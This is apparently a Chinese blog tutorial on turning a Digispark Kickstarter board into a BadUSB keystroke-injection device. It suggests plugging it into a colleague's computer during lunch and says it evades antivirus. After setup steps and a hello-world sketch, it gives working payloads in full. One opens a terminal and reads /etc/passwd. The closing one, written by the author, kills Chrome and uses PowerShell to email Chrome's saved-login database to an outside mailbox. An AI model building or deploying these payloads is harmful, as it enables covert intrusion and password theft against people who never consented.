利用 Digispark Kickstarter 制作 BadUSB

Table of Contents

BadUSB 简单来说就是一种插到别人电脑的 USB 上就能自动运行程序的设备,可以把 BadUSB 外观做成 U 盘一样诱导别人,投放到办公室区域,或者趁同事去吃午饭时偷偷插到 TA 电脑上。BadUSB 模拟键盘和鼠标输入(类似按键精灵),而不是特定的恶意程序,而杀毒软件又无法去检测写入到 BadUSB 固件里的指令,所以对杀毒软件来说是免疫的。

Digispark Kickstarter 基于 ATTINY85 的微控制器,虽然功能不强大,但非常便宜(大约 7~10 人民币),另外也不需要在目标电脑上单独安装驱动程序就能工作。

Digispark.png

官方给的 Digispark Kickstarter 参数如下:

- Support for the Arduino IDE 1.0+ (OSX/Win/Linux)
- Power via USB or External Source - 5v or 7-35v (automatic selection)
- On-board 500ma 5V Regulator
- Built-in USB (and serial debugging)
- 6 I/O Pins (2 are used for USB only if your program actively communicates over USB, otherwise you can use all 6 even if you are programming via USB)
- 8k Flash Memory (about 6k after bootloader)
- I2C and SPI (vis USI)
- PWM on 3 pins (more possible with Software PWM)
- ADC on 4 pins
- Power LED and Test/Status LED (on Pin0)

1. 环境安装

简记录下在 Fedora 中的安装过程,其他平台请自行参考官方文档:http://digistump.com/wiki/digispark/tutorials/connecting

新增 /etc/udev/rules.d/99-arduino-101.rules,内容如下:

# Arduino 101 in DFU Mode

SUBSYSTEM=="tty", ENV{ID_REVISION}=="8087", ENV{ID_MODEL_ID}=="0ab6", MODE="0666", ENV{ID_MM_DEVICE_IGNORE}="1", ENV{ID_MM_CANDIDATE}="0"
SUBSYSTEM=="usb", ATTR{idVendor}=="8087", ATTR{idProduct}=="0aba", MODE="0666", ENV{ID_MM_DEVICE_IGNORE}="1"

然后重加载 udev 规则:

sudo udevadm control --reload-rules

现在系统可以正常读取板子了。接着设置 Arduino IDE:

a、“文件”菜单->“首选项”,在“附加开发板管理器网址”中增加: http://digistump.com/package_digistump_index.json

b、“工具”菜单->“开发板”->“开发板管理器”,找到“Digistump AVR Boards by Digistump”并安装

c、“工具”菜单->“开发板”->,选择“Digispark (Default - 16.5mhz)”

d、“工具”菜单->“编辑器”,选择“USBtinyISP”

简单几个步骤完成后就可以对开发板编程了。

2. hello world

我们需要先测试开发板到底能不能正常工作、环境设置正不正确,所以先不搞那么复杂的代码,用官方给的示例代码就可以了。选择“文件”菜单->“示例”->“DigisparkKeyboard”,官方给示例代码很简单,不断输入“Hello Digispark!”:

#include "DigiKeyboard.h"

void setup() {
  // don't need to set anything up to use DigiKeyboard
}

void loop() {
  // this is generally not necessary but with some older systems it seems to
  // prevent missing the first character after a delay:
  DigiKeyboard.sendKeyStroke(0);

  // Type out this string letter by letter on the computer (assumes US-style
  // keyboard)

  DigiKeyboard.println("Hello Digispark!");
  // It's better to use DigiKeyboard.delay() over the regular Arduino delay()
  // if doing keyboard stuff because it keeps talking to the computer to make
  // sure the computer knows the keyboard is alive and connected
  DigiKeyboard.delay(5000);
}

然后点“项目”菜单->“上传”,在看到“Plug in device now… (will timeout in 60 seconds)”提示时把 Digispark 插入 USB,如果成功,你可以看到下面的打印信息:

> Please plug in the device ...
> Press CTRL+C to terminate the program.
> Device is found!
connecting: 16% complete
connecting: 22% complete
connecting: 28% complete
connecting: 33% complete
> Device has firmware version 1.6
> Available space for user applications: 6012 bytes
> Suggested sleep time between sending pages: 8ms
> Whole page count: 94  page size: 64
> Erase function sleep duration: 752ms
parsing: 50% complete
> Erasing the memory ...
erasing: 55% complete
erasing: 60% complete
erasing: 65% complete
> Starting to upload ...
writing: 70% complete
writing: 75% complete
writing: 80% complete
> Starting the user app ...
running: 100% complete
>> Micronucleus done. Thank you!

完毕之后,打开一个文本编辑器,看看系统是否就像在自动打字般不断输入“Hello Digispark!”。

3. Payload

网上有很多公开的 Payload,当然你也可以自己写,但最好事先看看别人的 Payload,这里有一些现成的 Payload 可用:https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

还需要一个把 Payload 转换成实际的代码的脚本 Duckyspark_translator.py:https://github.com/toxydose/Duckyspark

以“Payload Basic Terminal Commands Ubuntu”(https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---Basic-Terminal-Commands-Ubuntu)为例:

DELAY 3000
ALT F2
DELAY 500
STRING xterm
DELAY 500
ENTER
DELAY 750
STRING pwd
DELAY 500
ENTER
DELAY 300
STRING id
DELAY 300
ENTER
DELAY 500
STRING cat /etc/passwd
DELAY 500
ENTER

保存为 payload.txt,然后运行:

$ python3 Duckyspark_translator.py payload.txt out

这时会在当前目录下看到生成的 out.ino:

//generated by Duckyspark https://github.com/toxydose/Duckyspark

#include "DigiKeyboard.h"
#define KEY_ESC     41
#define KEY_BACKSPACE 42
#define KEY_TAB     43
#define KEY_PRT_SCR 70
#define KEY_DELETE  76
#define KEY_ARROW_RIGHT 0x4F
#define KEY_ARROW_DOWN  0x51
#define KEY_ARROW_UP    0x52

void setup() {

DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(3000);
DigiKeyboard.sendKeyStroke(KEY_F2,MOD_ALT_LEFT | 0);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("xterm"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER,0);
DigiKeyboard.delay(750);
DigiKeyboard.print(F("pwd"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER,0);
DigiKeyboard.delay(300);
DigiKeyboard.print(F("id"));
DigiKeyboard.delay(300);
DigiKeyboard.sendKeyStroke(KEY_ENTER,0);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("cat /etc/passwd"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER,0);

}

void loop() {

}

把代码复制到 Arduino IDE 的工程文件中并上传到开发板中。

其实 Payload 都很简单,就是针对不同的系统的各种按键+输入的组合,对于中文系统一定要考虑到在输命令前先按 Shift 键,把中文输入法切换为英文的。

下例,Windows 10 中用 PowerShell 将 Chrome 的数据文件发送到邮箱:

REM Author: lu4nx
DELAY 1000
GUI r
DELAY 200
SHIFT
DELAY 200
STRING powershell
DELAY 200
ENTER
ENTER
DELAY 1000
ALT y
DELAY 200
SHIFT
DELAY 200
STRING Get-Process -Name Chrome | Stop-Process;
STRING $SMTPServer = 'SMTP服务器地址';
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 25);
STRING $SMTPInfo.EnableSsl = $true;
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('帐号', '密码');
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage;$ReportEmail.From = '发件人邮箱';
STRING $ReportEmail.To.Add('收件人邮箱');
STRING $ReportEmail.Subject = 'Chrome';$ReportEmail.Body = ':)';
STRING $ReportEmail.Attachments.Add("${env:LocalAppData}\Google\Chrome\User Data\Default\Login Data");
STRING $SMTPInfo.Send($ReportEmail);
STRING Exit;
ENTER